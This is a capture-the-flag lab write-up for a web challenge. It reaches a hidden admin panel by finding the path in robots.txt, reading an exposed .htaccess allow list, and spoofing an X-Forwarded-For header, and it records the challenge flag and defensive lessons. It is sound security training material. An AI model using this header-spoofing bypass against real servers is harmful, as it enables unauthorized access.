================================
LAB: Moderate Grayhatcon CTF — HackerBay (Flag 1)
================================

[LAB INFORMATION]
-----------------
Date: 2026-03-03
Lab URL: https://f0af3b3e563154e9031f0935fe5ed0bb.ctf.hacker101.com
Category: Web
Level: Moderate
Objective: Access hidden admin area
Description: HackerBay auction platform. IP-restricted admin panel discoverable via robots.txt.

[RECONNAISSANCE]
----------------
- GET /robots.txt -> Disallow: s3cr3t-4dm1n/
- GET /s3cr3t-4dm1n/ -> 403 Forbidden
- GET /s3cr3t-4dm1n/.htaccess -> file downloaded, reveals IP whitelist:
    Order Deny,Allow
    Deny from all
    Allow from 8.8.8.8
    Allow from 8.8.4.4

[VULNERABILITY DISCOVERY]
-------------------------
Two chained vulnerabilities:
1. Information Disclosure: .htaccess publicly readable -> exposes IP whitelist rules
2. IP Spoofing: X-Forwarded-For header trusted blindly by server -> whitelist bypassable

[EXPLOITATION]
--------------
1. GET /robots.txt -> discovers /s3cr3t-4dm1n/
2. GET /s3cr3t-4dm1n/.htaccess -> downloads config, reveals allowed IPs (8.8.8.8, 8.8.4.4)
3. GET /s3cr3t-4dm1n/ with header X-Forwarded-For: 8.8.8.8
   -> 200 OK, admin login page + flag displayed

[EVIDENCE]
----------
Flag: ^FLAG^f5b7c8012f3877c3589e5ac9b1253aeba064e8c83b421b09567446b189c5871e$FLAG$

[LESSONS LEARNED]
-----------------
- robots.txt reveals sensitive paths — always check it during recon.
- .htaccess must never be publicly readable; deny access to dotfiles at server level.
- X-Forwarded-For is client-controlled and cannot be trusted for IP-based access control.
- IP whitelisting via proxy headers is not a security control — use network-level restrictions instead.
- Chained low-severity issues (info disclosure + header spoofing) can lead to critical access.